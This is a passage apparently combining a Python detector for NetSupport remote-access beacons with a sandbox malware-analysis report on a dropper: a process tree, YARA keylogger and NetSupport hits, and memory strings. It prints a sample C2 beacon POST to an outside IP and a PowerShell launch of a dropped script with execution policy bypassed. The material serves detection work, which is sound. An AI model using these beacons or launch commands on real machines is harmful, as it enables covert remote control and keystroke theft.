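    parts = re.split(r"\r?\n\r?\n", raw, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else "")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)

def request_host(req: HttpRequest) -> str:
    """Host header first; else the authority of an absolute-form target."""
    return (req.headers.get("host") or urlsplit(req.target).hostname or "").lower()

def classify(req: HttpRequest) -> list:
    """Return the NetSupport indicators one request matches, in a fixed order."""
    hits = []
    path = urlsplit(req.target).path
    if req.headers.get("user-agent", "").startswith("NetSupport Manager/"):
        hits.append("netsupport_user_agent")
    if req.method == "POST" and path.endswith("/fakeurl.htm"):
        hits.append("gateway_fakeurl_post")
    # The report flattened the 22-byte body to "CMD=POLLINFO=1ACK=1"; with
    # Content-Length 22 each field is followed by one separator byte, assumed
    # here to be LF (CR or '&' are accepted as well).
    fields = dict(re.findall(r"([A-Za-z]+)=([^\r\n&]*)", req.body))
    if fields.get("CMD") == "POLL":
        hits.append("gateway_poll_command")
    if request_host(req) == GEO_HOST and path == GEO_PATH:
        hits.append("netsupport_geo_lookup")
    return hits

def verdict(req: HttpRequest, allowed_gateways=frozenset()) -> str:
    """Triage one request. NetSupport Manager is a legitimate product, so a
    beacon to an allow-listed corporate gateway is "known_netsupport"; the
    vendor geolocation call or the User-Agent alone only proves a client is
    running ("netsupport_present"); gateway traffic elsewhere is an "alert"."""
    hits = classify(req)
    if not hits:
        return "clean"
    if request_host(req) in allowed_gateways:
        return "known_netsupport"
    if any(h.startswith("gateway_") for h in hits):
        return "alert"
    return "netsupport_present"

# Constructed from sessions 2-4 above; the POST body separators are reconstructed.
SAMPLE_BEACON = (
    "POST http://199.188.200.195/fakeurl.htm HTTP/1.1\r\n"
    "User-Agent: NetSupport Manager/1.3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 22\r\n"
    "Host: 199.188.200.195\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "CMD=POLL\nINFO=1\nACK=1\n"
)
SAMPLE_GEO = (
    "GET /location/loca.asp HTTP/1.1\r\n"
    "Host: geo.netsupportsoftware.com\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
SAMPLE_BENIGN = (  # ordinary browser request, constructed; should stay clean
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_BEACON, SAMPLE_GEO, SAMPLE_BENIGN):
        req = parse_request(raw)
        print(f"{verdict(req):<19} {req.method} {req.target}")
```

The HTTP layer alone cannot tell a commercial NetSupport deployment from this sample; what made the report's sessions suspicious is the combination with the process path C:\Users\user\AppData\Roaming\SystemUtil\client32.exe in the session table, so a production rule should join the verdict above with the originating process and the gateway address rather than alert on the User-Agent by itself.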


Target ID: 0
Start time: 13:01:57
Start date: 08/11/2024
Path: C:\Users\user\Desktop\KC0uZWwr8p.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\KC0uZWwr8p.exe"
Imagebase: 0x630000
File size: 21'424'072 bytes
MD5 hash: 3C387C0DB035C0C3185D6FBD1AB46BD1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
Has exited: true

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:13:01:57
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
                                                                                                                                                                                                  Imagebase:0x4c0000
                                                                                                                                                                                                  File size:3'305'472 bytes
                                                                                                                                                                                                  MD5 hash:77264DBCB409DE0C426BD5088B0FBE09
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:13:02:20
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
                                                                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:13:02:20
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:13:02:23
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.1905886353.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:13:02:36
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2034197288.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.2033095471.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:13:02:44
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2115416028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2113912617.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2116677838.0000000000788000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: Hbq$Hbq$Hbq$Hbq$TJcq$Te^q
• API String ID: 0-3655936231
• Opcode ID: 02a31bc83932d962a6345fb79eef4dcc634391550294a08302a08fb0fd8163dc
• Instruction ID: 6d565fa39b2df52cf8b707ee4cd3471be2fb414fbf2a2f57bc2703702c49e0ec
• Opcode Fuzzy Hash: 02a31bc83932d962a6345fb79eef4dcc634391550294a08302a08fb0fd8163dc
• Instruction Fuzzy Hash: 07C18871B006418FCB15DF7AD554A6EBBE3BF89300B18856DD50A8B3A1DF30EC468B92
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
Similarity
• API ID:
• String ID: ,etq$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
• API String ID: 0-1206794132
• Opcode ID: d35728b50db5c09efa92e5de34d79aad377e412b1098256c61f35c12e0554124
• Instruction ID: b5724b13b7c94aa05b30f3cd7bc7e2e516f82963cad647e1f7c2208ce14c231b
• Opcode Fuzzy Hash: d35728b50db5c09efa92e5de34d79aad377e412b1098256c61f35c12e0554124
• Instruction Fuzzy Hash: F7B127B1B20206DFDB388F69C64466BBBE2FF85310F1484AAE549CF251DB31D949C7A1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: d1da6c4b949809df580aaa66bae6cadcb3e2bdb8527bfb0cf3365a2ac766f82c
• Instruction ID: df59995ee221e155177594e3b5dff28984f8789428dcea8e207e7bd060ea5449
• Opcode Fuzzy Hash: d1da6c4b949809df580aaa66bae6cadcb3e2bdb8527bfb0cf3365a2ac766f82c
• Instruction Fuzzy Hash: 66129DB17243568FC7159B289911BBABBA6AFC2310F1480BBD585CF291DF31E8C5C7A1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q
• API String ID: 0-831282457
• Opcode ID: 9b0a53507930df509d10fe1b1e426e075f667f1a3a0d95b0d412405b47c36011
• Instruction ID: 37ea3059c2c8c618aaf32ee8ba1b8367adb5c9cf6de524b8e21dc907a6581776
• Opcode Fuzzy Hash: 9b0a53507930df509d10fe1b1e426e075f667f1a3a0d95b0d412405b47c36011
• Instruction Fuzzy Hash: B85258B1720246CFCB259B78CA40AAABBE2EF85310F1484AAE505DF351DF36DD45C7A1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: (Xcq$LR^q
• API String ID: 0-2856513941
• Opcode ID: 8af6cf0e7e425737c1d94a1a9e209d81d072e18521d547f30019e6756f2a1fa3
• Instruction ID: 2c1be9b1d7471aeb9defd9c71f9a237dc4b6c92dc3b827022f8776b5748d70c1
• Opcode Fuzzy Hash: 8af6cf0e7e425737c1d94a1a9e209d81d072e18521d547f30019e6756f2a1fa3
• Instruction Fuzzy Hash: 0D525670B00218CFDB25DB64C855BAEB7B3EF85300F1980A9D8499B395DB74AD85CF52
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q
• API String ID: 0-2697143702
• Opcode ID: 9acbd10d7e3ce8a79433d4c6e9f391cd8b79f366ae61522b974fd6ca4070949f
• Instruction ID: 818bb4b447896a345d34c03f916bdd16cce2c663fd018915b233506c1360ebb5
• Opcode Fuzzy Hash: 9acbd10d7e3ce8a79433d4c6e9f391cd8b79f366ae61522b974fd6ca4070949f
• Instruction Fuzzy Hash: C67128F0B30297CFCB24AF299644A7ABBE1AF85351F14806AD545CB355EB31C981C7E2
Strings
Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: (Xcq$LR^q
• API String ID: 0-2856513941
• Opcode ID: 2a88f41f28fe221015e6480e0a8027fd1132855d9a2e19b87834bd18ec0e541d
• Instruction ID: ad93ca7f72f167ee04744f7b24205e9065d3a1345b22f26d840cb94b5168e53a
• Opcode Fuzzy Hash: 2a88f41f28fe221015e6480e0a8027fd1132855d9a2e19b87834bd18ec0e541d
• Instruction Fuzzy Hash: 2B515A70B00214CFDB24CFA8C850B9EBBB2EF89700F1541A9D549AB394DBB1AD41CB91
Strings
Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq$(bq
• API String ID: 0-4224401849
• Opcode ID: 5dcf21d9ffda037b6d5c94c75f6c04516037bbfcad832799282713165e00add6
• Instruction ID: 6f028de7c351c98d75852e33aff30fc931eeceeda978fb80a1153c2ae1f5c11d
• Opcode Fuzzy Hash: 5dcf21d9ffda037b6d5c94c75f6c04516037bbfcad832799282713165e00add6
• Instruction Fuzzy Hash: 3B31D074A04124CFDB19ABA9E4187AE7BB2EF85351F18406ED406E7781CF748C42CB81
Strings
• PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD3CC5
Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
• API String ID: 0-1412611895
• Opcode ID: aaa9de73936f2090a016b879101b7b93081dc3461d16b155198918ddb1202404
• Instruction ID: 5a11a75de313ae8c4fc267bd93524cdc8c893c540225fa6913429e4d5c284311
• Opcode Fuzzy Hash: aaa9de73936f2090a016b879101b7b93081dc3461d16b155198918ddb1202404
• Instruction Fuzzy Hash: 17919DB4F00255CBCB289F79D16846EB7F7EF88760B288A1CD4129B394DF34AC458B51
Strings
• PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD3CC5
Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
• API String ID: 0-1412611895
• Opcode ID: e3865aa702924c2f6a1391c26f2e6de00a91835c23a124f50a26885f27f598e6
• Instruction ID: 8245af9829fadfcb3434b4bd2a3ff04c8007f70398ea9598ce7d1aac6bda2033
• Opcode Fuzzy Hash: e3865aa702924c2f6a1391c26f2e6de00a91835c23a124f50a26885f27f598e6
• Instruction Fuzzy Hash: 33919CB4F00615CBCB28AF79D16846EB7F7EF88760B688A1CD4129B394DF34AC458B51
Strings
• PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD422F, 07FD423D
Memory Dump Source
• Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
Similarity
• API ID:
• String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
• API String ID: 0-1412611895
• Opcode ID: e8bb48a88b704bd3a27435ce6893c5c514527fd9c0d35b2adf61ed26abf4050d
• Instruction ID: 13c4db7032665932d07a70ef0da93b9a162dc5bf2327afdcfdb76da4beac86ba
• Opcode Fuzzy Hash: e8bb48a88b704bd3a27435ce6893c5c514527fd9c0d35b2adf61ed26abf4050d
• Instruction Fuzzy Hash: 55416B757206508FC755CF39D88885ABBF5FF8962031682AAE809CB372DB71DC05CB90
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q
                                                                                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                                                                                    • Opcode ID: 1ff41d1be614bb9507dd76724f0f470290c12b95547433bea3fe66baf492836d
                                                                                                                                                                                                    • Instruction ID: a041781ad8c6ace81ab10716ea0e683f248a6d8442209e1f9f93e6a79f7c5479
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff41d1be614bb9507dd76724f0f470290c12b95547433bea3fe66baf492836d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F2155F57342C38FCB616E248A40B7ABBB1AF85250F0940A7D940CF265EB35C944C7B2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (bq
                                                                                                                                                                                                    • API String ID: 0-149360118
                                                                                                                                                                                                    • Opcode ID: 2b433d0433e521b81d17ba0807956d3dd340ea3cfd6b99f66c8f088b705bab44
                                                                                                                                                                                                    • Instruction ID: 02cb97556509ddcfe42cd7d3b95d247cb2d4addb635bac6bf7121d34a3846eff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b433d0433e521b81d17ba0807956d3dd340ea3cfd6b99f66c8f088b705bab44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 540156397590648FCB566BB9B0181AE7BE6DFC5261728416ED407C7B82CE388D028796
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z, xrefs: 07FD422F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: PK4xMcdjuSbcjttHTHTLzrwSGYZdeWlMWs+sMJlrTKcZh5iZ0Bkc3FYoDUbh5jiVb8o3Fi+NBMIPSkNR8Kuz3ExMuE06wSxUmKyiecn1ynS62riA0Qf63cOHodPDyYNw1Z
                                                                                                                                                                                                    • API String ID: 0-1412611895
                                                                                                                                                                                                    • Opcode ID: d16d253cefc95b4bbb21328ff99957b947238193e0045740ce7098e8cbd314ce
                                                                                                                                                                                                    • Instruction ID: d18bd9f5f9018257528749d5bd9f2686ecd9b7fb938b240cd37de3ed3e264056
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d16d253cefc95b4bbb21328ff99957b947238193e0045740ce7098e8cbd314ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0E532A287D21FC3068769EC848E6FFB5EED722432943ABF004C7522D79099808350
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: fc1df3d95b334cadb24601e4418c1d8c904360b4ef709552a31e3608287cf47b
                                                                                                                                                                                                    • Instruction ID: 6e387f0717bc0b12f879af54aa4f1b40c211fe49ecfee2fdbde021de2fed701c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1df3d95b334cadb24601e4418c1d8c904360b4ef709552a31e3608287cf47b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF10E75A00209DFCB15DF98D594A9DBBF2FF49310F288559E805AB365C731ED81CBA0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b4be69a57e870a85e4076d267f0de0514f6997703f64fa08c8e664ead3b3d4f9
                                                                                                                                                                                                    • Instruction ID: 8ae5e2d1d85a05b3dabaf9f1e9cf972df5c0d3ba0de5303b69607eb3fe342b5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4be69a57e870a85e4076d267f0de0514f6997703f64fa08c8e664ead3b3d4f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CA17F34A01254DFCB15DF68C8849AEBBF2FF89310F1584A9E949AB361DB35EC45CB90
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1912035134.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_43f0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ff22485b82e953409b0d387e27fe346080632f6644da3ce93d22fa7d727ddc41
                                                                                                                                                                                                    • Instruction ID: 851ef90457900cda375abcc6eedf02fb520dd7b4843aad034db3a767d7a0f0a5
